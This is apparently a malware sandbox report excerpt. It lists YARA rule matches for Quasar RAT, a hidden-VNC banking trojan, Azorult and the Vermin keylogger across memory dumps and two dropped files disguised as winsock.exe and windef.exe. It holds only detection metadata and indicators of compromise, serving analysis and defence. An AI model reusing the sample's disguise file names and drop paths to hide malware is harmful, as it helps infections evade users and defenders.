                      Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2, date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1, date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_banker_gen, date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic, date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_banker_gen, date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic, date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Azorult_1, author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_banker_gen, date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic, date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_banker_gen, date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic, date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Azorult_1, author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED, Matched rule: Vermin_Keylogger_Jan18_1, date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED, Matched rule: xRAT_1, date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED, Matched rule: Quasar_RAT_2, date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED, Matched rule: MAL_QuasarRAT_May19_1, date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED, Matched rule: CN_disclosed_20180208_KeyLogger_1, date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED, Matched rule: Vermin_Keylogger_Jan18_1, date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED, Matched rule: xRAT_1, date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
